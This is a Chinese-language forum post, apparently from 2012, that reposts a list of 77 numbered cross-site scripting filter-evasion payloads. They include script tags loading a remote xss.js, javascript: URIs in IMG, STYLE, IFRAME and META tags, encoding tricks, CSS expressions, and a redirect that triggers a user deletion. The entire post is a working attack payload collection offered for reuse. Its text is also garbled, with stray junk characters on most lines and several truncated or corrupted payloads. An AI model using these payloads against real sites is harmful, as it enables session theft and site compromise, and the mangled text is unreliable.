貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
/ v% S; {! I! k& Q2 i; x
$ w* w' b" r6 Y (1)普通的XSS JavaScript注入
; B8 @, h0 q- m. k <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) f( a/ E1 R2 L/ x3 H2 a m) G
) j! w. O! f+ A1 [0 N (2)IMG标签XSS使用JavaScript命令$ a, T% r% L5 C: a2 \6 x( D
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, l7 [3 k8 k, W; ~3 O. f( k8 S, B
0 j5 |/ C1 G$ A" O! M' Y3 e
(3)IMG标签无分号无引号8 l5 I6 b4 y' ^0 G
<IMG SRC=javascript:alert(‘XSS’)>* j' x& J' X% C4 D: v9 _
' c, @/ g- E; v6 u! W& ~& F" _! S (4)IMG标签大小写不敏感
/ g" Y: P- @6 k& E1 |- f+ V% J! v9 y1 y <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- s' A k8 e5 r0 O* }* ], B9 R: z/ [: q/ X9 q+ @- y; L* Y
(5)HTML编码(必须有分号)# S, l; u0 X* ] }: Y7 y2 B, X# q
<IMG SRC=javascript:alert(“XSS”)>
% T, L( s: C: e8 ^6 j: O2 k% f6 Q: @# d% f; r6 |
(6)修正缺陷IMG标签! |0 o6 t' L$ W3 B. O
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; ?! s" H# e0 J6 j
# `1 X& K2 g ^4 z& b# x7 C
(7)formCharCode标签(计算器)
4 ~0 b" {( @0 P) u8 O0 l7 x" U <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>) y7 Z/ w) e. R
' O4 j1 K# z! c- Q( A" i4 P0 w (8)UTF-8的Unicode编码(计算器)
( t- ^* Q; ?% |' Z7 L! A4 J <IMG SRC=jav..省略..S')>7 d6 q" |4 m2 k5 S7 H- p: a
9 \9 |! R5 D& z8 [+ E q. @# C
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
/ Y4 J9 m% b- r' I* o <IMG SRC=jav..省略..S')>
8 D ^; b5 W5 C, X4 M
- C1 H! g" E7 N (10)十六进制编码也是没有分号(计算器)' ~0 Q( r% G. o! N, v! q
<IMG SRC=java..省略..XSS')>
7 r% j6 w; H7 L7 }7 u; c1 v2 c9 y E' Y
(11)嵌入式标签,将Javascript分开
' R8 D7 S9 t6 u/ r <IMG SRC=”jav ascript:alert(‘XSS’);”>
, q+ P4 ~9 z" [! s) \' g/ ~( G" r
- y3 [ R/ E7 t: Z0 x6 ? (12)嵌入式编码标签,将Javascript分开
/ D+ a. h3 u J' z <IMG SRC=”jav ascript:alert(‘XSS’);”>
/ x- Z( g+ m$ q9 d1 B# y. a
; d7 B$ Q/ @% e! e* \" M4 c; P4 R (13)嵌入式换行符; s- |9 x) d+ X7 X# d; l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 _, a) X. g( f% T4 g
+ C o/ _- l: j0 u. r (14)嵌入式回车1 q3 F& {% I* M9 e; d1 c
<IMG SRC=”jav ascript:alert(‘XSS’);”>
6 J0 ], r5 A v# K% T2 Q. z0 [1 y
& y* Z( P9 ^5 x: X: m (15)嵌入式多行注入JavaScript,这是XSS极端的例子
0 i" |6 ]3 G0 T <IMG SRC=”javascript:alert(‘XSS‘)”>
; f8 E$ A/ Y, I X0 P S8 {' X5 J
(16)解决限制字符(要求同页面)' i" G2 W; {/ y2 d1 f
<script>z=’document.’</script>
% j& @. T) l, t) S- u" h" G <script>z=z+’write(“‘</script>
" ^) P1 n0 A2 [" J( d <script>z=z+’<script’</script>
( X& P( ]" V! r' t5 _2 i <script>z=z+’ src=ht’</script>
( e$ F% ^) J# O <script>z=z+’tp://ww’</script>( S5 ^8 Q" |- D* S8 _; l2 V
<script>z=z+’w.shell’</script>! C1 T% J$ x, e+ D: A0 u
<script>z=z+’.net/1.’</script>
/ g" _5 e; C/ s" I; s1 x4 V5 w2 N <script>z=z+’js></sc’</script>4 a9 N3 G3 M0 N6 d# A& ]
<script>z=z+’ript>”)’</script>
- y4 } o% u3 N9 _( ~- `* V: l: J <script>eval_r(z)</script>
0 H$ s! I3 _' Y( _/ T3 @+ ?; |
( f7 |. V. H$ S2 J0 J+ m (17)空字符
; `+ S& Q# E3 |6 g. J4 n perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
- p7 @: b) t0 [6 R% ~# H
/ y5 x5 Z# x8 G: i7 ~1 p ^ (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用. E$ b' C# p7 D: F& @8 @5 M' v F( X' g
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
. l" ~* U8 b; C7 _# Q$ {1 o; F2 s" o7 \( ^( w
(19)Spaces和meta前的IMG标签
& V" i9 R) P0 j- a4 q1 X <IMG SRC=” � javascript:alert(‘XSS’);”># Z! V1 k6 V4 i6 }6 o9 d
3 f0 y o ~. R6 ~4 a' u (20)Non-alpha-non-digit XSS9 p4 K" ?& y; l2 L3 t( E& @/ m4 p
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- u# C1 V. w9 ]4 `% q
; }+ Q4 o3 y# Q: u+ T9 q1 e
(21)Non-alpha-non-digit XSS to 2! w% t3 ^6 P7 Y/ W. N) C, L+ L
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 ~, Z9 v, m! n- d1 I- ^6 t
/ t0 l* Y: o+ M (22)Non-alpha-non-digit XSS to 3; ^- G0 {+ n4 R# f1 U# L4 o
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
: @; I* l% \) k; j- _8 g) `& o) W5 G! h8 d: _/ t: G8 P s$ y
(23)双开括号9 C: e) M' h0 ~" d# u3 L
<<SCRIPT>alert(“XSS”);//<</SCRIPT>4 v! [' l' G4 z5 [3 X3 m; \) b
$ z0 h' {2 w$ |% ~' ]
(24)无结束脚本标记(仅火狐等浏览器)
7 n3 o0 O( A3 j% ~$ { <SCRIPT SRC=http://3w.org/XSS/xss.js?<B> r7 F4 o8 ?5 A+ _! }- J; h
# F5 g9 l* ]% b8 j1 o7 \4 w6 r (25)无结束脚本标记2; d$ `- ^' ?4 @# t& O" e
<SCRIPT SRC=//3w.org/XSS/xss.js>. @) t0 t4 V: @
) M6 x0 l/ m9 ~5 X" L (26)半开的HTML/JavaScript XSS
! [& s u% C8 d) q5 F& N, _ <IMG SRC=”javascript:alert(‘XSS’)”
3 y; I+ g1 ^3 [
! M9 R/ G2 h4 ]9 `' S3 z0 W7 y (27)双开角括号) K# H0 [5 ? _- F
<iframe src=http://3w.org/XSS.html <
) ^& \% z3 H9 g% W0 |. r1 g, `
(28)无单引号 双引号 分号
- K% e+ {; H$ h# E+ L3 S <SCRIPT>a=/XSS/
5 i4 T+ c! R$ `1 g alert(a.source)</SCRIPT>. h$ y2 ^6 O- m& @5 ^ E1 x
: _- e* h- ?) F7 W+ \3 S
(29)换码过滤的JavaScript
/ W2 c3 R" \( R* t# r \”;alert(‘XSS’);//0 B. s6 N& _% I) u& m; S
% X. S2 y1 H2 s3 ^' m, P (30)结束Title标签
7 E z: j6 K3 H0 Y. Q/ R. j </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
( N+ ^7 ~6 l+ I: j( v0 W4 K& C' N! g0 Z# @$ Z1 E1 D
(31)Input Image
) ?$ T- b2 R( i( e) R7 Z9 x2 N+ ? <INPUT SRC=”javascript:alert(‘XSS’);”>% }0 _1 u3 p: T+ J
; M* y* ]) P1 C3 e: f/ H( T/ ] (32)BODY Image) w) W# r/ b5 Q0 w
<BODY BACKGROUND=”javascript:alert(‘XSS’)”># e w+ `: Y! x, k+ u" V5 ?: f
; y! j% Y- F: b$ U3 Y
(33)BODY标签
, Y8 |9 ?6 S2 ]- \; ? <BODY(‘XSS’)>4 }. u3 e* U# X8 ~# {2 [, S
( s8 l' t: e; a
(34)IMG Dynsrc
& `- |' i# A+ G5 [/ s <IMG DYNSRC=”javascript:alert(‘XSS’)”>
6 S; K/ U5 f7 ]; W: T% P! x" p0 v/ L& }( H
(35)IMG Lowsrc
8 ~0 V# {$ Y$ f! p8 N! B <IMG LOWSRC=”javascript:alert(‘XSS’)”>: J6 r4 e9 I3 X8 w0 d! z
$ c. |4 C+ A$ z$ o+ |+ ~6 |
(36)BGSOUND$ I6 o* ^% B! ^; U3 }# a
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
; o4 L. w3 D. g+ F
/ U5 D" _' j, a2 V+ l/ U$ M (37)STYLE sheet
+ Z0 c1 ~& l* S/ b9 B' P <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
, e: F3 t# ^+ b
% E1 |( g$ h6 v2 O3 A- d' Z (38)远程样式表/ r z3 M# {7 v* T- g. E0 u" h
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
! f0 v* n/ \. v* P3 t4 d' X; N7 O. P; a* \' ?
(39)List-style-image(列表式). z6 u0 `0 N: }% X. S, J
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS- V7 j- ]4 c& L/ w: B3 @1 ^
B' J2 v* Y" Q2 z' ?
(40)IMG VBscript a+ M. R. H- a. {( j2 B
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
/ L/ _& V) ~" d/ Q
+ O# ?# p9 }% }! Y8 S6 v) m (41)META链接url
' w7 c' p3 H) ] <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>$ L+ \" v5 U; s8 ?
4 _ S7 s9 f' V4 u
(42)Iframe
% m, U/ t. }# c; F1 X <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>1 f5 v) L- `" \, s! |
+ V! R, W' d" v (43)Frame4 c' n; W9 O" w9 c) a0 R
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
+ g7 a6 E8 r$ I0 w- Q6 [" O+ ^, C2 l1 o3 I4 h C8 w
(44)Table
( o r& q: D; ^' R! ~/ s <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
- x6 A. [$ h2 e- H" M( J; O
1 a' o1 f' n4 F1 l- u6 l (45)TD! n, `& X- S9 ]. d) C8 d; E
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>6 v5 V& e( }. z3 F$ q
( W8 v% @& ?8 S! e8 d4 F5 h7 {8 D (46)DIV background-image! k& H9 q+ t" Z0 U" m& w/ X2 E
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( f0 s; h* u @! o7 k; O Q; P) {
0 U o1 t+ Y% S+ h; r1 d# T (47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)* e3 v ^; J4 q, x/ k, @
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
, j. l& L$ g0 L9 W
# m6 g1 s' I4 d' V (48)DIV expression
1 T4 L; P* W$ P* w+ n& l/ ? <DIV STYLE=”width: expression_r(alert(‘XSS’));”>
* ` n8 u; h6 ^' u5 t, D# k
! p4 H, v& z0 k8 B/ d (49)STYLE属性分拆表达* ~% G! A1 ~( E( T! _6 T5 v$ O
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ D7 V5 F- X+ @
& `( p7 U7 ]8 w0 p
(50)匿名STYLE(组成:开角号和一个字母开头)
( T/ a+ \% Y, E8 z4 z8 x <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% I1 |) a; A; F6 [
7 ?' R. T- L! @" Z1 n (51)STYLE background-image7 S' z7 ^4 D: J) x# [+ h" K) ]
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
5 W, C- [% Q1 u
5 U8 a: {; t0 c! X( u X* _ (52)IMG STYLE方式; G8 K3 d0 u7 X7 B
exppression(alert(“XSS”))’>+ X1 l& c9 s) h$ D5 U) Y& j- O
+ `, v0 i" b1 S; m (53)STYLE background
* U' w/ k @ \ <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>9 X. R$ j+ z% B4 h2 ?$ |' i8 w
' G" k; J0 [6 e5 m0 D) T (54)BASE* p- T' N; i: x$ \
<BASE HREF=”javascript:alert(‘XSS’);//”>
7 X- m" Y* \* x, V' ]
, A% c6 G: `) I$ I% {! p1 ^ A (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# I0 I' w2 K! W7 Z9 @0 o <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 T) Q0 ]4 N5 M$ E5 P( Q7 c: l( z, X$ j: G
(56)在flash中使用ActionScrpt可以混进你XSS的代码
& M0 b! L) d8 m7 o( o3 @ a=”get”;
& }' L( z4 `$ r( r b=”URL(\”";/ Y: S. i% D* ~! N: S- I$ N
c=”javascript:”;
1 m+ d3 ?& v1 y d=”alert(‘XSS’);\”)”;
: Y( \# l z: x eval_r(a+b+c+d);9 k& d& J5 y: n' q5 |- ?- b6 F
( A; P4 @2 I/ ] (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) m% y% n6 `9 x1 z$ H6 Y2 ]$ V <HTML xmlns:xss>
0 a/ p% N3 a) Q, k; r: o/ L( d <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
+ g4 n% g0 E; d <xss:xss>XSS</xss:xss>
8 W% M2 V0 A( j% Q& e$ t </HTML>
9 z% O2 p3 {5 ?9 ~
. C. k4 R( g8 R1 H2 u+ j3 r (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
1 K; w* K' W ?4 p <SCRIPT SRC=””></SCRIPT>
! P7 C r* p6 ?( V; H, B. {! R/ F4 D; ^4 u" Z
(59)IMG嵌入式命令,可执行任意命令5 W0 _1 N4 C" |$ w5 \! r; R
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
( T1 ^% x0 |8 i- n8 p7 A
& Y1 R b$ T' f" [ (60)IMG嵌入式命令(a.jpg在同服务器): V$ z7 ? N7 P, L+ Z! C h
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser5 N7 p9 _' B; c6 ?8 \
: j6 B |/ _; h
(61)绕符号过滤# }* G* O' f, h7 T
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
: B$ u2 l; k$ k, k) x, V
( C. U) [' H7 O# w6 u (62)0 S8 U, ?! v: T7 Y1 L; e& f
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>; h8 G6 R: m5 {4 G
1 ]5 T) o) P" Y% f4 ~7 K; u
(63)
6 D: z1 f: O) i, ] <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
+ v! H( p9 D; i7 ]3 G9 L* r- E& n
(64)
, t6 W- `$ E' _: } <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
3 E, H) W/ \7 m. @6 b7 P r* I) T/ u. H. _0 K( |; G
(65)4 o0 {; g0 F4 U: Z/ e2 d
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ I8 ?( ?6 I m8 `
* X/ S' D; L; |3 d
(66)# p5 l6 d( L+ K; V% L; u
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
7 s8 ~. ]) c+ A8 K ^, n" O+ ~. }! z' c7 h; t4 q# S
(67)
- m" A9 f, e2 p <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT> V' N1 \- }4 z- H# U# Q4 @& N
; s# A; w; E1 p% O% L: p( E0 ^
(68)URL绕行0 L8 O. B9 [, D: z5 O& p
<A HREF=”http://127.0.0.1/”>XSS</A>2 G- S5 m% Y0 Q& q, h
$ n, a% Z4 h; Z
(69)URL编码
/ i! I2 L. \$ R& b <A HREF=”http://3w.org”>XSS</A>- [( u& Z5 o3 t) `( R Y
' y7 d1 g9 f: Z* T- h% D (70)IP十进制% g: i) }* X7 V2 O3 g3 u
<A HREF=”http://3232235521″>XSS</A>( m) j" h! j. Y: o% Q' s) m& r
* R! g8 h9 _5 T" X3 i% s (71)IP十六进制8 _! T. u$ n9 F" s) |4 Q9 }
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
! d1 c& d E. F, X8 Z
: @+ P: y. T* x* v7 A3 t (72)IP八进制
9 {( t2 j2 ~7 a' a8 ]: B <A HREF=”http://0300.0250.0000.0001″>XSS</A>1 N/ W8 x) R. K8 c7 @" o
& k! y. ^& Z' G. e4 b (73)混合编码
C% B0 n6 D# a: m <A HREF=”h
8 |6 b$ N5 r: A( u; ^ tt p://6 6.000146.0×7.147/”">XSS</A>& h9 T( o/ i" v, P6 D3 m9 i
) |' p+ ~! @7 A' s2 t. t
(74)节省[http:]
& e- B! _# l4 j& o- t1 y <A HREF=”//www.google.com/”>XSS</A>
/ _; E. p! c$ b7 i
$ k4 x3 M# H& L' i3 F) p; H; { (75)节省[www]
5 M. I- Q. s, u) m8 S <A HREF=”http://google.com/”>XSS</A>
3 l; D6 |4 M! }. J9 [- ~
+ l/ C' @2 u2 u" X# p8 m& X (76)绝对点绝对DNS
0 `1 k% o' B1 c: c( u) w# P& k <A HREF=”http://www.google.com./”>XSS</A>
( B) P! O% ~* W7 { G1 f. n7 t. ?9 X) O( O, w6 ?
(77)javascript链接& Z- V6 z4 v5 a1 Q6 {8 q1 \# p
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对